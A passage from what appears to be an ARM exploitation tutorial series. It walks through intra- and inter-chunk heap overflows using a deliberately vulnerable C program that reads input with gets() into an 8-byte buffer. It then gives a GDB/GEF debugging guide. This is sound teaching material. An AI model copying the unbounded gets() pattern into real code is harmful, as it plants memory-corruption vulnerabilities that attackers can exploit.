The picture above shows us a detailed break down of the Heap’s chunk associated with our object. The chunk has a header (8 bytes) and the user’s data section (12 bytes) storing our object. We see that the name field properly stores the supplied string of 7 A’s, terminated by a null-byte. The number field, stores 0x4d2 (1234 in decimal). So far so good. Let’s repeat these steps, but in this case enter 8 A’s.

While examining the Heap this time we see that the number’s field got corrupted (it’s now equal to 0x400 instead of 0x4d2). The null-byte terminator overwrote a portion (last byte) of the number’s field. This results in an intra-chunk Heap memory corruption. Effects of such a corruption in this case are not devastating, but visible. Logically, the else statement in the code should never be reached as the number’s field is intended to be static. However, the memory corruption we just observed makes it possible to reach that part of the code. This can be easily confirmed by the example below.

Inter-chunk Heap overflow

To illustrate how an inter-chunk Heap overflow looks like in practice we can use the following example, which we now compile withoutoptimization flag.

/*azeria@labs:~/exp $ gcc inter_chunk.c -o inter_chunk*/
#include "stdlib.h"
#include "stdio.h"

int main ( int argc, char* argv[] )
{
 char *some_string = malloc(8);  //create some_string "object" in Heap
 int *some_number = malloc(4);   //create some_number "object" in Heap

 *some_number = 1234;            //assign some_number a static value
 gets(some_string);              //ask user for input for some_string

 if(*some_number == 1234)        //check if static value (of some_number) is in tact
 {
 puts("Memory valid");
 }
 else                            //proceed here in case the static some_number gets corrupted
 {
 puts("Memory corrupted");
 }
}

The process here is similar to the previous ones: set a break-point after function “gets”, run the program, supply 7 A’s, investigate Heap.

Once the break-point is hit, we examine the Heap. In this case, we have two chunks. We see (image below) that their structure is in tact: the some_string is within its boundaries, the some_number is equal to 0x4d2.

Now, let’s supply 16 A’s and see what happens.

As you might have guessed, providing too much of input causes the overflow resulting into corruption of the adjacent chunk. In this case we see that our user input corrupted the header and the first byte of the some_number’s field. Here again, by corrupting the some_number we manage to reach the code section which logically should never be reached.

SUMMARY

In this part of the tutorial we got familiar with the process memory layout and the basics of Stack and Heap related memory corruptions. In the next part of this tutorial series we will cover other memory corruptions: Dangling pointer and Format String. Once we cover the most common types of memory corruptions, we will be ready for learning how to write working exploits.

ARM DEBUGGING WITH GDB

DEBUGGING WITH GDB

This is a very brief introduction into compiling ARM binaries and basic debugging with GDB. As you follow the tutorials, you might want to follow along and experiment with ARM assembly on your own. In that case, you would either need a spare ARM device, or you just set up your own Lab environment in a VM by following the steps in this short How-To.

You can use the following code from Stack and Functions, to get familiar with basic debugging with GDB.

.section .text
.global _start

_start:
    push {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add r11, sp, #0   /* Setting up the bottom of the stack frame */
    sub sp, sp, #16   /* End of the prologue. Allocating some buffer on the stack */
    mov r0, #1        /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */
    mov r1, #2        /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */
    bl max            /* Calling/branching to function max */
    sub sp, r11, #0   /* Start of the epilogue. Readjusting the Stack Pointer */
    pop {r11, pc}     /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */

max:
    push {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    add r11, sp, #0   /* Setting up the bottom of the stack frame */
    sub sp, sp, #12   /* End of the prologue. Allocating some buffer on the stack */
    cmp r0, r1        /* Implementation of if(a<b) */
    movlt r0, r1      /* if r0 was lower than r1, store r1 into r0 */
    add sp, r11, #0   /* Start of the epilogue. Readjusting the Stack Pointer */
    pop {r11}         /* restoring frame pointer */
    bx lr             /* End of the epilogue. Jumping back to main via LR register */

Personally, I prefer using GEF as a GDB extension. It gives me a better overview and useful features. You can try it out here: GEF – GDB Enhanced Features.

Save the code above in a file called max.s and compile it with the following commands:

$ as max.s -o max.o
$ ld max.o -o max

The debugger is a powerful tool that can:

  • Load a memory dump after a crash (post-mortem debugging)
  • Attach to a running process (used for server processes)
  • Launch a program and debug it

Launch GDB against either a binary, a core file, or a Process ID:

  • Attach to a process: $ gdb -pid $(pidof <process>)
  • Debug a binary: $ gdb ./file
  • Inspect a core (crash) file: $ gdb -c ./core.3243
$ gdb max

If you installed GEF, it drops you the gef> prompt.

This is how you get help:

  • (gdb) h
  • (gdb) apropos <search-term>
gef> apropos registers
collect -- Specify one or more data items to be collected at a tracepoint
core-file -- Use FILE as core dump for examining memory and registers
info all-registers -- List of all registers and their contents
info r -- List of integer registers and their contents
info registers -- List of integer registers and their contents
maintenance print cooked-registers -- Print the internal register configuration including cooked values
maintenance print raw-registers -- Print the internal register configuration including raw values
maintenance print registers -- Print the internal register configuration
maintenance print remote-registers -- Print the internal register configuration including each register's
p -- Print value of expression EXP
print -- Print value of expression EXP
registers -- Display full details on one
set may-write-registers -- Set permission to write into registers
set observer -- Set whether gdb controls the inferior in observer mode
show may-write-registers -- Show permission to write into registers
show observer -- Show whether gdb controls the inferior in observer mode
tui reg float -- Display only floating point registers
tui reg general -- Display only general registers
tui reg system -- Display only system registers

Breakpoint commands:

  • break (or just b) <function-name>
  • break <line-number>
  • break filename:function
  • break filename:line-number
  • break *<address>
  • break  +<offset>  
  • break  –<offset>
  • tbreak (set a temporary breakpoint)
  • del <number>  (delete breakpoint number x)
  • delete (delete all breakpoints)
  • delete <range> (delete breakpoint ranges)
  • disable/enable <breakpoint-number-or-range> (does not delete breakpoints, just enables/disables them)
  • continue (or just c) – (continue executing until next breakpoint)
  • continue <number> (continue but ignore current breakpoint number times. Useful for breakpoints within a loop.)
  • finish (continue to end of function)
gef> break _start
gef> info break
Num Type Disp Enb Address What
1 breakpoint keep y 0x00008054 <_start>
 breakpoint already hit 1 time
gef> del 1
gef> break *0x0000805c
Breakpoint 2 at 0x805c
gef> break _start

This deletes the first breakpoint and sets a breakpoint at the specified memory address. When you run the program, it will break at this exact location. If you would not delete the first breakpoint and just set a new one and run, it would break at the first breakpoint.

Start and Stop:

  • Start program execution from beginning of the program
    • run
    • r
    • run <command-line-argument>
  • Stop program execution
    • kill
  • Exit GDB debugger
    • quit
    • q
gef> run

Now that our program broke exactly where we wanted, it’s time to examine the memory. The command “x” displays memory contents in various formats.

Syntax: x/<count><format><unit>
FORMAT UNIT
x – Hexadecimal b – bytes
d – decimal h – half words (2 bytes)
i – instructions w – words (4 bytes)
t – binary (two) g – giant words (8 bytes)
o – octal
u – unsigned
s – string
c – character
gef> x/10i $pc
=> 0x8054 <_start>: push {r11, lr}
 0x8058 <_start+4>: add r11, sp, #0
 0x805c <_start+8>: sub sp, sp, #16
 0x8060 <_start+12>: mov r0, #1
 0x8064 <_start+16>: mov r1, #2
 0x8068 <_start+20>: bl 0x8074 <max>
 0x806c <_start+24>: sub sp, r11, #0
 0x8070 <_start+28>: pop {r11, pc}
 0x8074 <max>: push {r11}
 0x8078 <max+4>: add r11, sp, #0
gef> x/16xw $pc
0x8068 <_start+20>: 0xeb000001  0xe24bd000  0xe8bd8800  0xe92d0800
0x8078 <max+4>:     0xe28db000  0xe24dd00c  0xe1500001  0xb1a00001
0x8088 <max+20>:    0xe28bd000  0xe8bd0800  0xe12fff1e  0x00001741
0x8098:             0x61656100  0x01006962  0x0000000d  0x01080206

Commands for stepping through the code:

  • Step to next line of code. Will step into a function
    • stepi
    • s
    • step <number-of-steps-to-perform>
  • Execute next line of code. Will not enter functions
    • nexti
    • n
    • next <number>
  • Continue processing until you reach a specified line number, function name, address, filename:function, or filename:line-number
    • until
    • until <line-number>
  • Show current line number and which function you are in
    • where
gef> nexti 5
...
0x8068 <_start+20> bl 0x8074 <max> <- $pc
0x806c <_start+24> sub sp, r11, #0
0x8070 <_start+28> pop {r11, pc}
0x8074 <max> push {r11}
0x8078 <max+4> add r11, sp, #0
0x807c <max+8> sub sp, sp, #12
0x8080 <max+12> cmp r0, r1
0x8084 <max+16> movlt r0, r1
0x8088 <max+20> add sp, r11, #0

Examine the registers with info registers or i r

gef> info registers
r0     0x1     1
r1     0x2     2
r2     0x0     0
r3     0x0     0
r4     0x0     0
r5     0x0     0
r6     0x0     0
r7     0x0     0
r8     0x0     0
r9     0x0     0
r10    0x0     0
r11    0xbefff7e8 3204446184
r12    0x0     0
sp     0xbefff7d8 0xbefff7d8
lr     0x0     0
pc     0x8068  0x8068 <_start+20>
cpsr   0x10    16

The command “info registers” gives you the current register state. We can see the general purpose registers r0-r12, and the special purpose registers SP, LR, and PC, including the status register CPSR. The first four arguments to a function are generally stored in r0-r3. In this case, we manually moved values to r0 and r1.

Show process memory map:

gef> info proc map
process 10225
Mapped address spaces:

 Start Addr   End Addr    Size     Offset objfile
     0x8000     0x9000  0x1000          0   /home/pi/lab/max
 0xb6fff000 0xb7000000  0x1000          0          [sigpage]
 0xbefdf000 0xbf000000 0x21000          0            [stack]
 0xffff0000 0xffff1000  0x1000          0          [vectors]

With the command “disassemble” we look through the disassembly output of the function max.

gef> disassemble max
 Dump of assembler code for function max:
 0x00008074 <+0>: push {r11}
 0x00008078 <+4>: add r11, sp, #0
 0x0000807c <+8>: sub sp, sp, #12
 0x00008080 <+12>: cmp r0, r1
 0x00008084 <+16>: movlt r0, r1
 0x00008088 <+20>: add sp, r11, #0
 0x0000808c <+24>: pop {r11}
 0x00008090 <+28>: bx lr
 End of assembler dump.

GEF specific commands (more commands can be viewed using the command “gef”):

  • Dump all sections of all loaded ELF images in process memory
    • xfiles
  • Enhanced version of proc map, includes RWX attributes in mapped pages
    • vmmap
  • Memory attributes at a given address
    • xinfo
  • Inspect compiler level protection built into the running binary
    • checksec
gef> xfiles
     Start        End  Name File
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
gef> vmmap
     Start        End     Offset Perm Path
0x00008000 0x00009000 0x00000000 r-x /home/pi/lab/max
0xb6fff000 0xb7000000 0x00000000 r-x [sigpage]
0xbefdf000 0xbf000000 0x00000000 rwx [stack]
0xffff0000 0xffff1000 0x00000000 r-x [vectors]
gef> xinfo 0xbefff7e8
----------------------------------------[ xinfo: 0xbefff7e8 ]----------------------------------------
Found 0xbefff7e8
Page: 0xbefdf000 -> 0xbf000000 (size=0x21000)
Permissions: rwx
Pathname: [stack]
Offset (from page): +0x207e8
Inode: 0
gef> checksec
[+] checksec for '/home/pi/lab/max'
Canary:                  No
NX Support:              Yes
PIE Support:             No
RPATH:                   No
RUNPATH:                 No
Partial RelRO:           No
Full RelRO:              No
TROUBLESHOOTING

To make debugging with GDB more efficient it is useful to know where certain branches/jumps will take us. Certain (newer) versions of GDB resolve the addresses of a branch instruction and show us the name of the target function. For example, the following output of GDB lacks this feature:

...
0x000104f8 <+72>: bl 0x10334
0x000104fc <+76>: mov r0, #8
0x00010500 <+80>: bl 0x1034c
0x00010504 <+84>: mov r3, r0
...

And this is the output of GDB (native, without gef) which has the feature I’m talking about:

0x000104f8 <+72>:    bl      0x10334 <free@plt>
0x000104fc <+76>:    mov     r0, #8
0x00010500 <+80>:    bl      0x1034c <malloc@plt>
0x00010504 <+84>:    mov     r3, r0

If you don’t have this feature in your GDB, you can either update the Linux sources (and hope that they already have a newer GDB in their repositories) or compile a newer GDB by yourself. If you choose to compile the GDB by yourself, you can use the following commands:

cd /tmp
wget https://ftp.gnu.org/gnu/gdb/gdb-7.12.tar.gz
tar vxzf gdb-7.12.tar.gz
sudo apt-get update
sudo apt-get install libreadline-dev python-dev texinfo -y
cd gdb-7.12
./configure --prefix=/usr --with-system-readline --with-python && make -j4
sudo make -j4 -C gdb/ install
gdb --version

I used the commands provided above to download, compile and run GDB on Raspbian (jessie) without problems. these commands will also replace the previous version of your GDB. If you don’t want that, then skip the command which ends with the word install. Moreover, I did this while emulating Raspbian in QEMU, so it took me a long time (hours), because of the limited resources (CPU) on the emulated environment. I used GDB version 7.12, but you would most likely succeed even with a newer version (click HERE for other versions).